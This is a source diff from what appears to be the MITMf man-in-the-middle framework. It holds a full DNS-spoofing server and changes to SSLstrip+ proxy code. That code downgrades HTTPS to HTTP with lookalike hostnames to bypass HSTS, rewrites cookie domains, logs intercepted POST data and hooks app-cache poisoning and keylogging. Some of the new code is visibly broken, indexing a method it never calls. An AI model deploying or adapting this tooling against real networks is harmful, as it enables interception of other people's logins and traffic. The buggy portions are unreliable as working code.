dnschef_logger = logging.getLogger('dnschef')
|
||||
fileHandler = logging.FileHandler("./logs/dnschef/dnschef.log")
|
||||
fileHandler.setFormatter(formatter)
|
||||
dnschef_logger.addHandler(fileHandler)
|
||||
|
||||
# DNSHandler Mixin. The class contains generic functions to parse DNS requests and
|
||||
# calculate an appropriate response based on user parameters.
|
||||
class DNSHandler():
|
||||
|
||||
def parse(self,data):
|
||||
|
||||
nametodns = DNSChef.getInstance().nametodns
|
||||
nameservers = DNSChef.getInstance().nameservers
|
||||
hsts = DNSChef.getInstance().hsts
|
||||
hstsconfig = DNSChef.getInstance().real_records
|
||||
server_address = DNSChef.getInstance().server_address
|
||||
|
||||
response = ""
|
||||
|
||||
try:
|
||||
# Parse data as DNS
|
||||
d = DNSRecord.parse(data)
|
||||
|
||||
except Exception, e:
|
||||
dnschef_logger.info("{} ERROR: invalid DNS request".format(self.client_address[0]))
|
||||
|
||||
else:
|
||||
# Only Process DNS Queries
|
||||
if QR[d.header.qr] == "QUERY":
|
||||
|
||||
# Gather query parameters
|
||||
# NOTE: Do not lowercase qname here, because we want to see
|
||||
# any case request weirdness in the logs.
|
||||
qname = str(d.q.qname)
|
||||
|
||||
# Chop off the last period
|
||||
if qname[-1] == '.': qname = qname[:-1]
|
||||
|
||||
qtype = QTYPE[d.q.qtype]
|
||||
|
||||
# Find all matching fake DNS records for the query name or get False
|
||||
fake_records = dict()
|
||||
|
||||
for record in nametodns:
|
||||
|
||||
fake_records[record] = self.findnametodns(qname, nametodns[record])
|
||||
|
||||
if hsts:
|
||||
if qname in hstsconfig:
|
||||
response = self.hstsbypass(hstsconfig[qname], qname, nameservers, d)
|
||||
return response
|
||||
|
||||
elif qname[:4] == 'wwww':
|
||||
response = self.hstsbypass(qname[1:], qname, nameservers, d)
|
||||
return response
|
||||
|
||||
elif qname[:3] == 'web':
|
||||
response = self.hstsbypass(qname[3:], qname, nameservers, d)
|
||||
return response
|
||||
|
||||
# Check if there is a fake record for the current request qtype
|
||||
if qtype in fake_records and fake_records[qtype]:
|
||||
|
||||
fake_record = fake_records[qtype]
|
||||
|
||||
# Create a custom response to the query
|
||||
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
|
||||
|
||||
dnschef_logger.info("{} cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record))
|
||||
|
||||
# IPv6 needs additional work before inclusion:
|
||||
if qtype == "AAAA":
|
||||
ipv6 = IP(fake_record)
|
||||
ipv6_bin = ipv6.strBin()
|
||||
ipv6_hex_tuple = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
|
||||
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](ipv6_hex_tuple)))
|
||||
|
||||
elif qtype == "SOA":
|
||||
mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
|
||||
times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
|
||||
|
||||
# dnslib doesn't like trailing dots
|
||||
if mname[-1] == ".": mname = mname[:-1]
|
||||
if rname[-1] == ".": rname = rname[:-1]
|
||||
|
||||
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
|
||||
|
||||
elif qtype == "NAPTR":
|
||||
order,preference,flags,service,regexp,replacement = fake_record.split(" ")
|
||||
order = int(order)
|
||||
preference = int(preference)
|
||||
|
||||
# dnslib doesn't like trailing dots
|
||||
if replacement[-1] == ".": replacement = replacement[:-1]
|
||||
|
||||
response.add_answer( RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,DNSLabel(replacement))) )
|
||||
|
||||
elif qtype == "SRV":
|
||||
priority, weight, port, target = fake_record.split(" ")
|
||||
priority = int(priority)
|
||||
weight = int(weight)
|
||||
port = int(port)
|
||||
if target[-1] == ".": target = target[:-1]
|
||||
|
||||
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
|
||||
|
||||
elif qtype == "DNSKEY":
|
||||
flags, protocol, algorithm, key = fake_record.split(" ")
|
||||
flags = int(flags)
|
||||
protocol = int(protocol)
|
||||
algorithm = int(algorithm)
|
||||
key = base64.b64decode(("".join(key)).encode('ascii'))
|
||||
|
||||
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
|
||||
|
||||
elif qtype == "RRSIG":
|
||||
covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
|
||||
covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
|
||||
algorithm = int(algorithm)
|
||||
labels = int(labels)
|
||||
orig_ttl = int(orig_ttl)
|
||||
sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
|
||||
sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
|
||||
key_tag = int(key_tag)
|
||||
if name[-1] == '.': name = name[:-1]
|
||||
sig = base64.b64decode(("".join(sig)).encode('ascii'))
|
||||
|
||||
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig)))
|
||||
|
||||
else:
|
||||
# dnslib doesn't like trailing dots
|
||||
if fake_record[-1] == ".": fake_record = fake_record[:-1]
|
||||
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
|
||||
|
||||
response = response.pack()
|
||||
|
||||
elif qtype == "*" and not None in fake_records.values():
|
||||
dnschef_logger.info("{} cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records."))
|
||||
|
||||
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
|
||||
|
||||
for qtype,fake_record in fake_records.items():
|
||||
if fake_record:
|
||||
|
||||
# NOTE: RDMAP is a dictionary map of qtype strings to handling classses
|
||||
# IPv6 needs additional work before inclusion:
|
||||
if qtype == "AAAA":
|
||||
ipv6 = IP(fake_record)
|
||||
ipv6_bin = ipv6.strBin()
|
||||
fake_record = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
|
||||
|
||||
elif qtype == "SOA":
|
||||
mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
|
||||
times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
|
||||
|
||||
# dnslib doesn't like trailing dots
|
||||
if mname[-1] == ".": mname = mname[:-1]
|
||||
if rname[-1] == ".": rname = rname[:-1]
|
||||
|
||||
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
|
||||
|
||||
elif qtype == "NAPTR":
|
||||
order,preference,flags,service,regexp,replacement = fake_record.split(" ")
|
||||
order = int(order)
|
||||
preference = int(preference)
|
||||
|
||||
# dnslib doesn't like trailing dots
|
||||
if replacement and replacement[-1] == ".": replacement = replacement[:-1]
|
||||
|
||||
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,replacement)))
|
||||
|
||||
elif qtype == "SRV":
|
||||
priority, weight, port, target = fake_record.split(" ")
|
||||
priority = int(priority)
|
||||
weight = int(weight)
|
||||
port = int(port)
|
||||
if target[-1] == ".": target = target[:-1]
|
||||
|
||||
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
|
||||
|
||||
elif qtype == "DNSKEY":
|
||||
flags, protocol, algorithm, key = fake_record.split(" ")
|
||||
flags = int(flags)
|
||||
protocol = int(protocol)
|
||||
algorithm = int(algorithm)
|
||||
key = base64.b64decode(("".join(key)).encode('ascii'))
|
||||
|
||||
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
|
||||
|
||||
elif qtype == "RRSIG":
|
||||
covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
|
||||
covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
|
||||
algorithm = int(algorithm)
|
||||
labels = int(labels)
|
||||
orig_ttl = int(orig_ttl)
|
||||
sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
|
||||
sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
|
||||
key_tag = int(key_tag)
|
||||
if name[-1] == '.': name = name[:-1]
|
||||
sig = base64.b64decode(("".join(sig)).encode('ascii'))
|
||||
|
||||
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig) ))
|
||||
|
||||
else:
|
||||
# dnslib doesn't like trailing dots
|
||||
if fake_record[-1] == ".": fake_record = fake_record[:-1]
|
||||
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
|
||||
|
||||
response = response.pack()
|
||||
|
||||
# Proxy the request
|
||||
else:
|
||||
dnschef_logger.debug("[DNSChef] {} proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname))
|
||||
|
||||
nameserver_tuple = random.choice(nameservers).split('#')
|
||||
response = self.proxyrequest(data, *nameserver_tuple)
|
||||
|
||||
return response
|
||||
|
||||
|
||||
# Find appropriate ip address to use for a queried name. The function can
|
||||
def findnametodns(self,qname,nametodns):
|
||||
|
||||
# Make qname case insensitive
|
||||
qname = qname.lower()
|
||||
|
||||
# Split and reverse qname into components for matching.
|
||||
qnamelist = qname.split('.')
|
||||
qnamelist.reverse()
|
||||
|
||||
# HACK: It is important to search the nametodns dictionary before iterating it so that
|
||||
# global matching ['*.*.*.*.*.*.*.*.*.*'] will match last. Use sorting for that.
|
||||
for domain,host in sorted(nametodns.iteritems(), key=operator.itemgetter(1)):
|
||||
|
||||
# NOTE: It is assumed that domain name was already lowercased
|
||||
# when it was loaded through --file, --fakedomains or --truedomains
|
||||
# don't want to waste time lowercasing domains on every request.
|
||||
|
||||
# Split and reverse domain into components for matching
|
||||
domain = domain.split('.')
|
||||
domain.reverse()
|
||||
|
||||
# Compare domains in reverse.
|
||||
for a,b in map(None,qnamelist,domain):
|
||||
if a != b and b != "*":
|
||||
break
|
||||
else:
|
||||
# Could be a real IP or False if we are doing reverse matching with 'truedomains'
|
||||
return host
|
||||
else:
|
||||
return False
|
||||
|
||||
# Obtain a response from a real DNS server.
|
||||
def proxyrequest(self, request, host, port="53", protocol="udp"):
|
||||
reply = None
|
||||
try:
|
||||
if DNSChef.getInstance().ipv6:
|
||||
|
||||
if protocol == "udp":
|
||||
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
|
||||
elif protocol == "tcp":
|
||||
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
|
||||
|
||||
else:
|
||||
if protocol == "udp":
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
elif protocol == "tcp":
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
|
||||
sock.settimeout(3.0)
|
||||
|
||||
# Send the proxy request to a randomly chosen DNS server
|
||||
|
||||
if protocol == "udp":
|
||||
sock.sendto(request, (host, int(port)))
|
||||
reply = sock.recv(1024)
|
||||
sock.close()
|
||||
|
||||
elif protocol == "tcp":
|
||||
sock.connect((host, int(port)))
|
||||
|
||||
# Add length for the TCP request
|
||||
length = binascii.unhexlify("%04x" % len(request))
|
||||
sock.sendall(length+request)
|
||||
|
||||
# Strip length from the response
|
||||
reply = sock.recv(1024)
|
||||
reply = reply[2:]
|
||||
|
||||
sock.close()
|
||||
|
||||
except Exception, e:
|
||||
dnschef_logger.warning("could not proxy request: {}".format(e))
|
||||
else:
|
||||
return reply
|
||||
|
||||
def hstsbypass(self, real_domain, fake_domain, nameservers, d):
|
||||
|
||||
dnschef_logger.info("{} resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain))
|
||||
|
||||
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
|
||||
|
||||
nameserver_tuple = random.choice(nameservers).split('#')
|
||||
|
||||
#First proxy the request with the real domain
|
||||
q = DNSRecord.question(real_domain).pack()
|
||||
r = self.proxyrequest(q, *nameserver_tuple)
|
||||
|
||||
#Parse the answer
|
||||
dns_rr = DNSRecord.parse(r).rr
|
||||
|
||||
#Create the DNS response
|
||||
for res in dns_rr:
|
||||
if res.get_rname() == real_domain:
|
||||
res.set_rname(fake_domain)
|
||||
response.add_answer(res)
|
||||
else:
|
||||
response.add_answer(res)
|
||||
|
||||
return response.pack()
|
||||
|
||||
# UDP DNS Handler for incoming requests
|
||||
class UDPHandler(DNSHandler, SocketServer.BaseRequestHandler):
|
||||
|
||||
def handle(self):
|
||||
(data,socket) = self.request
|
||||
response = self.parse(data)
|
||||
|
||||
if response:
|
||||
socket.sendto(response, self.client_address)
|
||||
|
||||
# TCP DNS Handler for incoming requests
|
||||
class TCPHandler(DNSHandler, SocketServer.BaseRequestHandler):
|
||||
|
||||
def handle(self):
|
||||
data = self.request.recv(1024)
|
||||
|
||||
# Remove the addition "length" parameter used in the
|
||||
# TCP DNS protocol
|
||||
data = data[2:]
|
||||
response = self.parse(data)
|
||||
|
||||
if response:
|
||||
# Calculate and add the additional "length" parameter
|
||||
# used in TCP DNS protocol
|
||||
length = binascii.unhexlify("%04x" % len(response))
|
||||
self.request.sendall(length+response)
|
||||
|
||||
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
|
||||
|
||||
# Override SocketServer.UDPServer to add extra parameters
|
||||
def __init__(self, server_address, RequestHandlerClass):
|
||||
self.address_family = socket.AF_INET6 if DNSChef.getInstance().ipv6 else socket.AF_INET
|
||||
|
||||
SocketServer.UDPServer.__init__(self,server_address,RequestHandlerClass)
|
||||
|
||||
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
|
||||
|
||||
# Override default value
|
||||
allow_reuse_address = True
|
||||
|
||||
# Override SocketServer.TCPServer to add extra parameters
|
||||
def __init__(self, server_address, RequestHandlerClass):
|
||||
self.address_family = socket.AF_INET6 if DNSChef.getInstance().ipv6 else socket.AF_INET
|
||||
|
||||
SocketServer.TCPServer.__init__(self,server_address,RequestHandlerClass)
|
||||
|
||||
class DNSChef(ConfigWatcher):
|
||||
|
||||
_instance = None
|
||||
|
||||
tcp = False
|
||||
ipv6 = False
|
||||
hsts = False
|
||||
real_records = dict()
|
||||
nametodns = dict()
|
||||
server_address = "0.0.0.0"
|
||||
nameservers = ["8.8.8.8"]
|
||||
port = 53
|
||||
|
||||
@staticmethod
|
||||
def getInstance():
|
||||
if DNSChef._instance == None:
|
||||
DNSChef._instance = DNSChef()
|
||||
|
||||
return DNSChef._instance
|
||||
|
||||
def onConfigChange(self):
|
||||
config = self.config['MITMf']['DNS']
|
||||
|
||||
self.port = int(config['port'])
|
||||
|
||||
# Main storage of domain filters
|
||||
# NOTE: RDMAP is a dictionary map of qtype strings to handling classe
|
||||
for qtype in RDMAP.keys():
|
||||
self.nametodns[qtype] = dict()
|
||||
|
||||
# Adjust defaults for IPv6
|
||||
if config['ipv6'].lower() == 'on':
|
||||
self.ipv6 = True
|
||||
if config['nameservers'] == "8.8.8.8":
|
||||
self.nameservers = "2001:4860:4860::8888"
|
||||
|
||||
# Use alternative DNS servers
|
||||
if config['nameservers']:
|
||||
self.nameservers = config['nameservers'].split(',')
|
||||
|
||||
for section in config.sections:
|
||||
|
||||
if section in self.nametodns:
|
||||
for domain,record in config[section].iteritems():
|
||||
|
||||
# Make domain case insensitive
|
||||
domain = domain.lower()
|
||||
|
||||
self.nametodns[section][domain] = record
|
||||
|
||||
for k,v in self.config["SSLstrip+"].iteritems():
|
||||
self.real_records[v] = k
|
||||
|
||||
def setHstsBypass(self):
|
||||
self.hsts = True
|
||||
|
||||
def start(self):
|
||||
self.onConfigChange()
|
||||
self.startConfigWatch()
|
||||
|
||||
if self.config['MITMf']['DNS']['tcp'].lower() == 'on':
|
||||
self.startTCP()
|
||||
else:
|
||||
self.startUDP()
|
||||
|
||||
# Initialize and start the DNS Server
|
||||
def startUDP(self):
|
||||
server = ThreadedUDPServer((self.server_address, int(self.port)), UDPHandler)
|
||||
# Start a thread with the server -- that thread will then start
|
||||
# more threads for each request
|
||||
server_thread = threading.Thread(target=server.serve_forever)
|
||||
|
||||
# Exit the server thread when the main thread terminates
|
||||
server_thread.daemon = True
|
||||
server_thread.start()
|
||||
|
||||
# Initialize and start the DNS Server
|
||||
def startTCP(self):
|
||||
server = ThreadedTCPServer((self.server_address, int(self.port)), TCPHandler)
|
||||
|
||||
# Start a thread with the server -- that thread will then start
|
||||
# more threads for each request
|
||||
server_thread = threading.Thread(target=server.serve_forever)
|
||||
|
||||
# Exit the server thread when the main thread terminates
|
||||
server_thread.daemon = True
|
||||
server_thread.start()
|
|
@ -49,17 +49,15 @@ class ClientRequest(Request):
|
|||
Request.__init__(self, channel, queued)
|
||||
self.reactor = reactor
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
self.hsts = URLMonitor.getInstance().isHstsBypass()
|
||||
self.hsts = URLMonitor.getInstance().hsts
|
||||
self.cookieCleaner = CookieCleaner.getInstance()
|
||||
self.dnsCache = DnsCache.getInstance()
|
||||
self.plugins = ProxyPlugins.getInstance()
|
||||
#self.uniqueId = random.randint(0, 10000)
|
||||
|
||||
#Use are own DNS server instead of reactor.resolve()
|
||||
self.resolver = URLMonitor.getInstance().getResolver()
|
||||
self.customResolver = dns.resolver.Resolver()
|
||||
self.customResolver.nameservers = ['127.0.0.1']
|
||||
self.customResolver.port = URLMonitor.getInstance().getResolverPort()
|
||||
|
||||
def cleanHeaders(self):
|
||||
headers = self.getAllHeaders().copy()
|
||||
|
@ -70,7 +68,7 @@ class ClientRequest(Request):
|
|||
if self.hsts:
|
||||
|
||||
if 'referer' in headers:
|
||||
real = self.urlMonitor.real
|
||||
real = self.urlMonitor.getHstsConfig()[0]
|
||||
if len(real) > 0:
|
||||
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
|
||||
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
|
||||
|
@ -133,7 +131,7 @@ class ClientRequest(Request):
|
|||
if self.hsts:
|
||||
|
||||
host = self.urlMonitor.URLgetRealHost(str(host))
|
||||
real = self.urlMonitor.real
|
||||
real = self.urlMonitor.getHstsConfig()[0]
|
||||
patchDict = self.urlMonitor.patchDict
|
||||
url = 'http://' + host + path
|
||||
self.uri = url # set URI to absolute
|
||||
|
@ -179,7 +177,7 @@ class ClientRequest(Request):
|
|||
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
|
||||
|
||||
def handleHostResolvedError(self, error):
|
||||
mitmf_logger.debug("[ClientRequest] Host resolution error: " + str(error))
|
||||
mitmf_logger.debug("[ClientRequest] Host resolution error: {}".format(error))
|
||||
try:
|
||||
self.finish()
|
||||
except:
|
||||
|
@ -195,16 +193,20 @@ class ClientRequest(Request):
|
|||
|
||||
mitmf_logger.debug("[ClientRequest] Host not cached.")
|
||||
|
||||
if self.resolver == 'dnschef':
|
||||
if self.urlMonitor.getResolver() == 'dnschef':
|
||||
|
||||
self.customResolver.port = self.urlMonitor.getResolverPort()
|
||||
|
||||
try:
|
||||
mitmf_logger.debug("[ClientRequest] Resolving with DNSChef")
|
||||
address = str(self.customResolver.query(host)[0].address)
|
||||
return defer.succeed(address)
|
||||
except Exception:
|
||||
mitmf_logger.debug("[ClientRequest] Exception occured, falling back to reactor.resolve()")
|
||||
mitmf_logger.debug("[ClientRequest] Exception occured, falling back to Twisted")
|
||||
return reactor.resolve(host)
|
||||
|
||||
elif self.resolver == 'twisted':
|
||||
elif self.urlMonitor.getResolver() == 'twisted':
|
||||
mitmf_logger.debug("[ClientRequest] Resolving with Twisted")
|
||||
return reactor.resolve(host)
|
||||
|
||||
def process(self):
|
||||
|
|
|
@ -40,7 +40,7 @@ class SSLServerConnection(ServerConnection):
|
|||
def __init__(self, command, uri, postData, headers, client):
|
||||
ServerConnection.__init__(self, command, uri, postData, headers, client)
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
self.hsts = URLMonitor.getInstance().isHstsBypass()
|
||||
self.hsts = URLMonitor.getInstance().hsts
|
||||
|
||||
def getLogLevel(self):
|
||||
return logging.INFO
|
||||
|
@ -58,7 +58,7 @@ class SSLServerConnection(ServerConnection):
|
|||
if v[:7].lower()==' domain':
|
||||
dominio=v.split("=")[1]
|
||||
mitmf_logger.debug("[SSLServerConnection][HSTS] Parsing cookie domain parameter: %s"%v)
|
||||
real = self.urlMonitor.sustitucion
|
||||
real = self.urlMonitor.getHstsConfig()[1]
|
||||
if dominio in real:
|
||||
v=" Domain=%s"%real[dominio]
|
||||
mitmf_logger.debug("[SSLServerConnection][HSTS] New cookie domain parameter: %s"%v)
|
||||
|
@ -85,13 +85,13 @@ class SSLServerConnection(ServerConnection):
|
|||
if ((not link.startswith('http')) and (not link.startswith('/'))):
|
||||
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
|
||||
|
||||
mitmf_logger.debug("Found path-relative link in secure transmission: " + link)
|
||||
mitmf_logger.debug("New Absolute path-relative link: " + absoluteLink)
|
||||
mitmf_logger.debug("[SSLServerConnection] Found path-relative link in secure transmission: " + link)
|
||||
mitmf_logger.debug("[SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
|
||||
elif not link.startswith('http'):
|
||||
absoluteLink = "http://"+self.headers['host']+link
|
||||
|
||||
mitmf_logger.debug("Found relative link in secure transmission: " + link)
|
||||
mitmf_logger.debug("New Absolute link: " + absoluteLink)
|
||||
mitmf_logger.debug("[SSLServerConnection] Found relative link in secure transmission: " + link)
|
||||
mitmf_logger.debug("[SSLServerConnection] New Absolute link: " + absoluteLink)
|
||||
|
||||
if not absoluteLink == "":
|
||||
absoluteLink = absoluteLink.replace('&', '&')
|
||||
|
|
|
@ -55,8 +55,8 @@ class ServerConnection(HTTPClient):
|
|||
self.client = client
|
||||
self.clientInfo = None
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
self.hsts = URLMonitor.getInstance().isHstsBypass()
|
||||
self.app = URLMonitor.getInstance().isAppCachePoisoning()
|
||||
self.hsts = URLMonitor.getInstance().hsts
|
||||
self.app = URLMonitor.getInstance().app
|
||||
self.plugins = ProxyPlugins.getInstance()
|
||||
self.isImageRequest = False
|
||||
self.isCompressed = False
|
||||
|
@ -70,7 +70,7 @@ class ServerConnection(HTTPClient):
|
|||
if self.command == 'GET':
|
||||
try:
|
||||
user_agent = parse(self.headers['user-agent'])
|
||||
self.clientInfo = "{0} [type:{1}-{2} os:{3}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
|
||||
self.clientInfo = "{} [type:{}-{} os:{}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
|
||||
except:
|
||||
self.clientInfo = "{} ".format(self.client.getClientIP())
|
||||
|
||||
|
@ -93,7 +93,7 @@ class ServerConnection(HTTPClient):
|
|||
elif 'keylog' in self.uri:
|
||||
self.plugins.hook()
|
||||
else:
|
||||
mitmf_logger.warning("{0} {1} Data ({2}):\n{3}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
|
||||
mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
|
||||
self.transport.write(self.postData)
|
||||
|
||||
def connectionMade(self):
|
||||
|
@ -106,7 +106,7 @@ class ServerConnection(HTTPClient):
|
|||
self.sendPostData()
|
||||
|
||||
def handleStatus(self, version, code, message):
|
||||
mitmf_logger.debug("[ServerConnection] Server response: {0} {1} {2}".format(version, code, message))
|
||||
mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message))
|
||||
self.client.setResponseCode(int(code), message)
|
||||
|
||||
def handleHeader(self, key, value):
|
||||
|
|
|
@ -34,12 +34,12 @@ class ServerConnectionFactory(ClientFactory):
|
|||
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
|
||||
|
||||
def clientConnectionFailed(self, connector, reason):
|
||||
mitmf_logger.debug("Server connection failed.")
|
||||
mitmf_logger.debug("[ServerConnectionFactory] Server connection failed.")
|
||||
|
||||
destination = connector.getDestination()
|
||||
|
||||
if (destination.port != 443):
|
||||
mitmf_logger.debug("Retrying via SSL")
|
||||
mitmf_logger.debug("[ServerConnectionFactory] Retrying via SSL")
|
||||
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
|
||||
else:
|
||||
try:
|
||||
|
|
|
@ -18,6 +18,7 @@
|
|||
|
||||
import re, os
|
||||
import logging
|
||||
from core.ConfigWatcher import ConfigWatcher
|
||||
|
||||
mitmf_logger = logging.getLogger('mimtf')
|
||||
|
||||
|
@ -31,8 +32,6 @@ class URLMonitor:
|
|||
# Start the arms race, and end up here...
|
||||
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
|
||||
_instance = None
|
||||
sustitucion = {} # LEO: diccionario host / sustitucion
|
||||
real = {} # LEO: diccionario host / real
|
||||
patchDict = {
|
||||
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
|
||||
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
|
||||
|
@ -46,9 +45,6 @@ class URLMonitor:
|
|||
self.faviconReplacement = False
|
||||
self.hsts = False
|
||||
self.app = False
|
||||
self.hsts_config = None
|
||||
self.resolver = 'dnschef'
|
||||
self.resolverport = 53
|
||||
|
||||
@staticmethod
|
||||
def getInstance():
|
||||
|
@ -57,21 +53,13 @@ class URLMonitor:
|
|||
|
||||
return URLMonitor._instance
|
||||
|
||||
#This is here because I'm lazy
|
||||
def setResolver(self, resolver):
|
||||
self.resolver = str(resolver).lower()
|
||||
|
||||
#This is here because I'm lazy
|
||||
def getResolver(self):
|
||||
return self.resolver
|
||||
|
||||
#This is here because I'm lazy
|
||||
def setResolverPort(self, port):
|
||||
self.resolverport = int(port)
|
||||
return ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['resolver'].lower()
|
||||
|
||||
#This is here because I'm lazy
|
||||
def getResolverPort(self):
|
||||
return self.resolverport
|
||||
return int(ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['port'])
|
||||
|
||||
def isSecureLink(self, client, url):
|
||||
for expression in URLMonitor.javascriptTrickery:
|
||||
|
@ -92,7 +80,7 @@ class URLMonitor:
|
|||
s.add(to_url)
|
||||
return
|
||||
url_set = set([from_url, to_url])
|
||||
mitmf_logger.debug("[URLMonitor][AppCachePoison] Set redirection: %s" % url_set)
|
||||
mitmf_logger.debug("[URLMonitor][AppCachePoison] Set redirection: {}".format(url_set))
|
||||
self.redirects.append(url_set)
|
||||
|
||||
def getRedirectionSet(self, url):
|
||||
|
@ -123,15 +111,15 @@ class URLMonitor:
|
|||
port = 443
|
||||
|
||||
if self.hsts:
|
||||
if not self.sustitucion.has_key(host):
|
||||
if not self.getHstsConfig[1].has_key(host):
|
||||
lhost = host[:4]
|
||||
if lhost=="www.":
|
||||
self.sustitucion[host] = "w"+host
|
||||
self.real["w"+host] = host
|
||||
self.getHstsConfig[1][host] = "w"+host
|
||||
self.getHstsConfig[0]["w"+host] = host
|
||||
else:
|
||||
self.sustitucion[host] = "web"+host
|
||||
self.real["web"+host] = host
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] SSL host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
|
||||
self.getHstsConfig[1][host] = "web"+host
|
||||
self.getHstsConfig[0]["web"+host] = host
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.getHstsConfig[1][host]))
|
||||
|
||||
url = 'http://' + host + path
|
||||
#mitmf_logger.debug("HSTS stripped URL: %s %s"%(client, url))
|
||||
|
@ -139,7 +127,7 @@ class URLMonitor:
|
|||
self.strippedURLs.add((client, url))
|
||||
self.strippedURLPorts[(client, url)] = int(port)
|
||||
|
||||
return 'http://'+ self.sustitucion[host] + path
|
||||
return 'http://'+ self.getHstsConfig[1][host] + path
|
||||
|
||||
else:
|
||||
url = method + host + path
|
||||
|
@ -150,40 +138,35 @@ class URLMonitor:
|
|||
def setFaviconSpoofing(self, faviconSpoofing):
|
||||
self.faviconSpoofing = faviconSpoofing
|
||||
|
||||
def setHstsBypass(self, hstsconfig):
|
||||
self.hsts = True
|
||||
self.hsts_config = hstsconfig
|
||||
def getHstsConfig(self):
|
||||
sustitucion = dict()
|
||||
real = dict()
|
||||
|
||||
for k,v in self.hsts_config.iteritems():
|
||||
self.sustitucion[k] = v
|
||||
self.real[v] = k
|
||||
for k,v in ConfigWatcher.getInstance().getConfig()['SSLstrip+']:
|
||||
sustitucion[k] = v
|
||||
real[v] = k
|
||||
|
||||
return (real, sustitucion)
|
||||
|
||||
def setHstsBypass(self):
|
||||
self.hsts = True
|
||||
|
||||
def setAppCachePoisoning(self):
|
||||
self.app = True
|
||||
|
||||
def setClientLogging(self, clientLogging):
|
||||
self.clientLogging = clientLogging
|
||||
|
||||
def isFaviconSpoofing(self):
|
||||
return self.faviconSpoofing
|
||||
|
||||
def isClientLogging(self):
|
||||
return self.clientLogging
|
||||
|
||||
